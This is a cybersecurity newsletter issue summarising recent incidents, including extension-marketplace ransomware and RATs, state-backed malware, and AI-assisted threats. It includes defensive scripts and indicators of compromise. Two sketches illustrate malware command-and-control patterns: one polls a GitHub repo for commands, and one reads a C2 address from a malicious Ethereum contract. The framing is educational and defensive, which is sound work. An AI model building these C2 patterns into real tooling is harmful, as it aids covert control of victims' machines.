🎓️ Vulnerable U | #141

Ransomvibing in the extension marketplace, Google's security predictions for 2026, Russia targets Ukraine's grain industry with cyberattacks, and much more!

Read Time: 9 minutes


Hey! Thanks for being here.

Just got back from a cool event that Decibel put together in Miami - and while hearing from some of the industry’s leading CISOs and AI experts was cool and all, the highlight for me was meeting probably the pinnacle of my childhood idols, Derek Jeter. If you don’t know, I was born and raised in NY just outside the city and have been a lifelong, sometimes obsessive, Yankees fan. So there really isn’t anyone much higher on my list I’d be excited to meet than Jeter.

I got to ask him a question during his talk and I asked something along the lines of, “New York is one of the toughest towns to be an athlete…” - He interrupted me and emphasized THE toughest. - “You were a shining example of someone who excelled there for longer than most. What do you say to the young kids entering that spotlight and pressure cooker so they can survive?”

His answer was basically perfect. Paraphrasing: “Be accountable. The fans want to root for you. But if you have a bad game, you stand in front of your locker and answer the questions. I would talk to the media 2-3 times a day and sometimes players would sneak out after a bad game and then I’d have to be answering questions about them. If you’re going to sneak out, do it after a good game. Be accountable.”

I think this is good life advice outside of sports and felt like you’d all like to hear it. He’s a class act and an exceptional leader. During his talk he emphasized how important it is for him to feel prepared - in all aspects of his life, he hates feeling unprepared. I think we security nerds can empathize there too.

ICYMI

🖊️ Something I wrote: A zero-day developer has had an insider accused of selling secrets to Russia.

🎧️ Something I heard: ChatGPT made me delusional

🎤 Something I said: My run down of the FFmpeg drama

🔖 Something I read: Thomas Ptacek (@tqbf) - You Should Write An Agent

Vulnerable News

Someone just pushed actual ransomware to the VS Code marketplace and somehow Microsoft's review process missed it. The extension was hilariously obvious - literally called "suspicious VSX" by publisher "suspicious publisher" - but it still made it through. The malware encrypts files, uses GitHub as a C2 channel, and exfiltrates data, though thankfully it only targets a test directory by default. The developer accidentally shipped the decryption keys, and the README even includes helpful instructions on how to re-run the encryption.

This whole thing screams AI-generated code based on the comments and structure. The researcher who found it managed to trace it back to the actual developer through leaked system info that got uploaded via the C2 channel - turns out the dev's own machine info ended up in the GitHub repo. While this particular example is sloppy, it highlights a real problem: if something this blatantly malicious can slip through Microsoft's filters, what happens when someone builds a more convincing version? (read more)
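To make the C2 part concrete, here's a rough sketch of the GitHub-as-C2 polling pattern (the repo and file names below are made up, not taken from the actual extension). The appeal for attackers is that the "C2 traffic" is just HTTPS to api.github.com, which blends right in on a developer machine:

```python
# Sketch of GitHub-as-C2 polling - hypothetical repo/paths, benign stand-in.
import base64
import time

import requests  # pip install requests

C2_REPO = "some-user/innocuous-repo"  # hypothetical attacker-controlled repo
COMMANDS_PATH = "commands.json"       # hypothetical file the malware polls

def fetch_commands() -> str:
    """Read the latest 'commands' file via the public GitHub contents API."""
    url = f"https://api.github.com/repos/{C2_REPO}/contents/{COMMANDS_PATH}"
    resp = requests.get(url, timeout=10)
    resp.raise_for_status()
    # The contents API returns the file body base64-encoded inside JSON.
    return base64.b64decode(resp.json()["content"]).decode()

while True:
    print("would execute:", fetch_commands())  # real malware acts on this
    time.sleep(300)  # poll every five minutes
```

You can't just block api.github.com on a dev workstation, which is exactly why this channel is attractive.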

In the last month, Island found that 52% of enterprises saw employees trying to upload corporate files to personal AI accounts.

It’s common because the place where we work with AI wasn’t designed to work with AI.

Island’s Enterprise Browser changes that. It protects data at the prompt level before files or sensitive information ever feed into AI engines. That means employees can safely use any AI app, corporate or personal, while admins keep full control and visibility.

Can your browser do that? → [read more]

*Sponsored

Three cybersecurity insiders, including employees from DigitalMint and Sygnia, got caught running BlackCat ransomware operations against five US companies. Ryan Goldberg was an IR manager at Sygnia, while Kevin Martin and an unnamed accomplice worked as ransomware negotiators at DigitalMint. Just absolutely wild to be working as a ransomware negotiator and incident responder and deploying ransomware as a side hustle.

They hit healthcare, pharma, engineering, and drone manufacturing companies between May and November 2023, demanding ransoms from $300k to $10M. Only managed to squeeze $1.27M out of one victim though. Goldberg apparently cracked during FBI questioning, claiming he did it to clear some debts. Both named suspects are looking at up to 50 years in federal prison, while their mystery partner hasn't been indicted yet. Both companies have cut ties with the employees and are cooperating with law enforcement. (read more)

The Russian-backed threat actor Curly COMrades figured out how to hide their malware inside tiny Hyper-V virtual machines on compromised Windows systems. They'd enable Hyper-V, drop in a 120MB Alpine Linux VM, and run their custom tools (CurlyShell and CurlCat) from inside this isolated environment. Pretty sneaky way to dodge EDR detection, since most security tools can't see what's happening inside the VM.

Beyond the VM trick, they were injecting Kerberos tickets into LSASS for lateral movement and using Group Policy to create persistent local accounts across domain systems. While the VM isolation is clever, the network traffic still has to exit through the host, so network-based detection can still catch them. (read more)
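If you want a quick hunting angle on this one, something like the sketch below can flag boxes where Hyper-V is enabled and VMs nobody asked for are running. It needs admin rights plus the Hyper-V PowerShell module on the host, and the allowlist is a placeholder for your environment:

```python
# Hedged hunting sketch: flag Windows hosts where Hyper-V is enabled and
# unrecognized VMs are running. Get-WindowsOptionalFeature and Get-VM are
# standard PowerShell cmdlets; KNOWN_VMS is a hypothetical allowlist.
import json
import subprocess

KNOWN_VMS = {"build-agent-01"}  # hypothetical: VMs you expect on this host

def powershell(cmd: str) -> str:
    return subprocess.run(
        ["powershell", "-NoProfile", "-Command", cmd],
        capture_output=True, text=True, check=True,
    ).stdout

state = powershell(
    "(Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All).State"
).strip()

if state == "Enabled":
    raw = powershell("Get-VM | Select-Object Name, State | ConvertTo-Json")
    vms = json.loads(raw) if raw.strip() else []
    vms = [vms] if isinstance(vms, dict) else vms  # one VM serializes as an object
    for vm in vms:
        if vm["Name"] not in KNOWN_VMS:
            print(f"unexpected VM on this host: {vm['Name']} (state {vm['State']})")
```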

I think it’s incredibly important we watch all the Russia vs Ukraine cyber activity as it shows a glimpse into modern warfare having both kinetic and cyber elements. I look at it the same way European generals came to study early American wars that involved firearms for the first time. Important to see how it changes the battlefield.

This new report shows Sandworm's going after Ukraine's grain industry with wiper malware. ESET researchers tracked the GRU-linked group deploying two wipers called Zerolot and Sting against Ukrainian grain, energy, logistics, and government targets between June and September. Agriculture hasn't been hit much directly before - it's a key export revenue source for Ukraine, so this feels like economic warfare ramped up a notch. (read more)

Google just dropped their annual crystal-ball-gazing session with the Cybersecurity Forecast 2026 report. The big theme this year, you’ll be shocked to find out, is AI. They think, and I agree, it’s about to become table stakes for both attackers and defenders. Threat actors are moving from dabbling with AI to making it their bread and butter, with voice cloning for social engineering and prompt injection attacks targeting enterprise AI systems. Meanwhile, the good guys are getting "Agentic SOCs" and a thousand other AI tools, both offensive and defensive, to help with their workload.

On the crime front, ransomware crews are doubling down on targeting virtualization infrastructure (because why compromise one system when you can own the whole estate?) and moving their operations onto public blockchains for better resilience. Nation-state activity is predictably messy - Russia's pivoting from tactical Ukraine support to long-term strategic ops, China's still doing China things with high-volume stealthy campaigns, and North Korea keeps running their IT worker scams to fund the regime. Nothing groundbreaking here, but it's a solid roadmap for what's coming down the pike. (read more)

148 security analysts investigated real alerts with and without AI assistance. The AI-assisted group was 29% more accurate and 61% faster. Even skeptics changed their minds.

*Sponsored

Gootloader, a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access, is back with some new tricks. It’s now using custom WOFF2 fonts to pull off some neat visual obfuscation - what looks like gibberish characters in the source code magically transforms into legitimate filenames when rendered in your browser. Think "‛›μI€vSO₽*'Oaμ==€‚‚33O%33‚€×[TM€v3cwv," displaying as "Florida_HOA_Committee_Meeting_Guide.pdf". Pretty slick way to defeat static analysis tools looking for suspicious keywords.
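If you want to triage one of these yourself, a reasonable first pass is dumping the font's character map with fontTools. A sketch (the file name is hypothetical; note the cmap alone only shows which glyph each gibberish codepoint maps to - actually rendering those glyphs, or diffing outlines against a stock font, is what recovers the real string):

```python
# Triage sketch: inspect a Gootloader-style WOFF2 character map with fontTools.
# Requires: pip install fonttools brotli   (brotli is needed for WOFF2 files)
from fontTools.ttLib import TTFont

font = TTFont("suspicious.woff2")  # hypothetical font pulled from the page
cmap = font.getBestCmap()          # Unicode codepoint -> glyph name

obfuscated = "‛›μI€vSO₽"           # a chunk of the on-page gibberish
for ch in obfuscated:
    print(f"U+{ord(ch):04X} ({ch!r}) -> {cmap.get(ord(ch), '<unmapped>')}")
```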

Huntress observed three infections where threat actors moved from initial JavaScript execution to reconnaissance in just 20 minutes, then achieved domain controller compromise within 17 hours. (Side note - I commonly advise security teams to drive towards a sub 20 minute response and containment time. Here is more ammo for me!) The attack patterns remain predictable though - AD enumeration, Kerberoasting, lateral movement via WinRM, then Volume Shadow Copy enumeration as ransomware prep. (read more)

Google analyzed five different AI-generated malware families and found them to be… shit. These samples - with names like PromptLock and FruitShell - were easily detected by basic security tools and had glaring gaps like missing persistence mechanisms and evasion tactics. One was literally part of an academic study that the researchers themselves admitted had "clear limitations."

Companies like Anthropic have been pushing narratives about advanced AI-powered ransomware, while startups claim AI is "lowering the bar" for threat actors. But when you actually look at what's being produced, it's mostly experimental junk that any decent endpoint protection can catch. As one researcher put it, if you were paying malware developers for this stuff, "you would be furiously asking for a refund." (read more)

GreyNoise decided to poke the bear and see if anyone's actively hunting MCP deployments in the wild. They spun up three different MCP honeypots - one open, one requiring API keys, and one with a deliberately exposed key to see who'd take the bait. All three got discovered within days (because everything on the internet gets found eventually), but here's the interesting part: zero MCP-specific attacks showed up. Just the usual background noise of HTTP probes and SSH pokes that hit literally everything online.

The real story here isn't what happened, but what didn't. That baseline of "normal internet noise" is actually valuable intel for defenders - it tells you what to expect before the bad guys start getting creative with AI middleware attacks. There was one controlled research demo of a prompt-hijacking bug in October, but that was just a proof-of-concept, not real-world exploitation. (read more)
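If you want your own MCP canary, the official Python SDK makes a decoy server cheap to stand up. A minimal sketch - the server and tool names are invented bait, and the logging is deliberately bare-bones:

```python
# Minimal MCP honeypot sketch using the official `mcp` Python SDK.
# Nobody legitimate should ever call the decoy tool, so any hit is signal.
import datetime
import json

from mcp.server.fastmcp import FastMCP

mcp = FastMCP("internal-finance-tools")  # enticing decoy server name

@mcp.tool()
def get_payroll_report(quarter: str) -> str:
    """Decoy tool: log every invocation, return nothing useful."""
    with open("mcp_honeypot.log", "a") as log:
        log.write(json.dumps({
            "ts": datetime.datetime.now(datetime.timezone.utc).isoformat(),
            "tool": "get_payroll_report",
            "quarter": quarter,
        }) + "\n")
    return "Report temporarily unavailable."

if __name__ == "__main__":
    mcp.run(transport="sse")  # serve over SSE/HTTP so scanners can find it
```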

Google's Threat Intelligence Group is out with a report showing we've hit a new milestone in AI abuse - threat actors are now deploying malware that calls AI APIs during execution. The standout here is PROMPTFLUX, experimental malware that uses Gemini's API to rewrite its own code every hour to evade detection, and PROMPTSTEAL, which APT28 (Russia's finest) used against Ukraine to generate system commands on the fly via Hugging Face APIs. This marks a shift from just using AI for productivity to actual "just-in-time" operational capabilities. (read more)
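Blocking this client-side is hard, but the egress side is watchable. Here's a hedged sketch that greps proxy logs for direct calls to well-known LLM API endpoints from hosts that have no business making them - the log format and allowlist are hypothetical, so adapt it to whatever your proxy actually emits:

```python
# Hedged sketch: flag LLM API traffic from unexpected sources in proxy logs.
# Assumes a hypothetical CSV log of the form: src_ip,dest_host,bytes
import csv

LLM_API_HOSTS = {
    "generativelanguage.googleapis.com",  # Gemini API (abused by PROMPTFLUX)
    "api-inference.huggingface.co",       # Hugging Face (abused by PROMPTSTEAL)
    "api.openai.com",
}
ALLOWED_SOURCES = {"10.0.5.21"}  # hypothetical: hosts approved for AI API use

with open("proxy.log") as f:
    for src_ip, dest_host, _ in csv.reader(f):
        if dest_host in LLM_API_HOSTS and src_ip not in ALLOWED_SOURCES:
            print(f"unexpected LLM API traffic: {src_ip} -> {dest_host}")
```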

Japanese media giant Nikkei just disclosed a breach affecting over 17,000 people after hackers snagged Slack credentials from an employee's personal computer using infostealer malware. The attackers then used those stolen creds to access company Slack accounts and made off with names, email addresses, and chat histories. Hudson Rock actually tracked down the specific infostealer instance that likely did the deed - turns out this type of malware has compromised over 270,000 Slack credentials across various organizations. (read more)

Proofpoint researchers stumbled across a new Iranian threat actor they're calling UNK_SmudgedSerpent that's been targeting academics and policy experts with some interesting social engineering. The group is using lures about Iranian political developments to hook their targets. What started as benign conversations about Iran's societal changes quickly turned into credential harvesting attempts and RMM tool deployments. (read more)

Google's AI agent "Big Sleep" just scored a hat trick of vulns in Apple Safari's WebKit engine. The bugs include a buffer overflow, use-after-free, and several memory corruption issues that could crash Safari or worse. Apple rolled out patches across the board - iOS 26.1, macOS Tahoe 26.1, and basically every Apple device you can think of got an update this week. (go patch!)

This is actually pretty cool from a research perspective. Big Sleep (formerly Project Naptime) is Google's AI-powered bug hunter that's been making waves lately. Earlier this year it found a SQLite vulnerability, and now it's poking at WebKit. No evidence these bugs were exploited in the wild, but AI is getting better and better at finding these kinds of bugs. (read more)

Heads up to anyone using Cursor or other VSCode-style editors - there's a new RAT called SleepyDuck making the rounds through Open VSX. It masquerades as a legit Solidity extension (juan-bianco.solidity-vlang). The attackers published a harmless version first, waited for 14,000 downloads, then pushed the malicious 0.0.8 update. Once installed, it activates when you open new editor windows or touch .sol files, then starts phoning home to sleepyduck[.]xyz every 30 seconds.

They're using an Ethereum contract as backup C2 infrastructure. If their main server gets nuked, the malware can pull new commands and server addresses straight from the blockchain at contract address 0xDAfb81732db454DA238e9cFC9A9Fe5fb8e34c465. Secure Annex has tracked over 20 similar malicious Solidity extensions since July, all trying to fool developers into installing them. The extension marketplaces really need to get their act together, because this attack pattern is becoming way too common. (read more)
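For the curious, reading a "backup C2" back out of a contract like this is nearly a one-liner with web3.py. Big caveat: the getter name and ABI below are hypothetical - you'd recover the real ones from the decompiled contract - but it shows why the pattern is so resilient. Nobody can take the blockchain down, so defenders have to kill the extension itself:

```python
# Hedged sketch of the "blockchain as bulletproof C2" pattern with web3.py.
# The contract address is from the report; the getter/ABI are hypothetical.
from web3 import Web3  # pip install web3

w3 = Web3(Web3.HTTPProvider("https://eth.llamarpc.com"))  # any public RPC node

CONTRACT = "0xDAfb81732db454DA238e9cFC9A9Fe5fb8e34c465"
ABI = [{  # hypothetical view function; the real contract's ABI would differ
    "name": "getServer", "type": "function", "stateMutability": "view",
    "inputs": [], "outputs": [{"name": "", "type": "string"}],
}]

contract = w3.eth.contract(address=Web3.to_checksum_address(CONTRACT), abi=ABI)
print("current C2:", contract.functions.getServer().call())
```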

MIT Sloan just got schooled by security researcher Kevin Beaumont for publishing some truly awful research. Their working paper claimed that 80% of ransomware attacks in 2024 were "AI-driven" - a stat so ridiculous that even Google's AI Overview called BS on it. Beaumont tore the paper apart, pointing out it attributed AI to ransomware groups that don't even use it and mentioned Emotet as "AI driven" (Emotet's been dead for years). Marcus Hutchins piled on too, saying he "burst out laughing" at the methodology.

After Beaumont's public takedown, MIT quietly pulled the study and replaced it with a generic "we're updating based on recent reviews" message. The whole thing reeks of what Beaumont has dubbed "cyberslop" - trusted institutions making baseless AI threat claims to profit off perceived expertise. It doesn't help that some of the MIT authors sit on the board of Safe Security, the company that co-authored the research. (read more)

Mike Privette dug into three years of funding data and found that despite dominating headlines, AI security only represents 9% of cybersecurity deals and a measly 3% of total funding. His thesis is we're not seeing a revolution, we're watching good old-fashioned absorption. AI is getting baked into existing security categories the same way cloud did a decade ago.

The really interesting bit is the funding flip that happened in 2024. Money started flowing away from "Security for AI" (protecting AI systems) toward "AI for Security" (using AI to improve security tools), with the latter growing 624%. (read more)

Miscellaneous mattjay

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.


Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay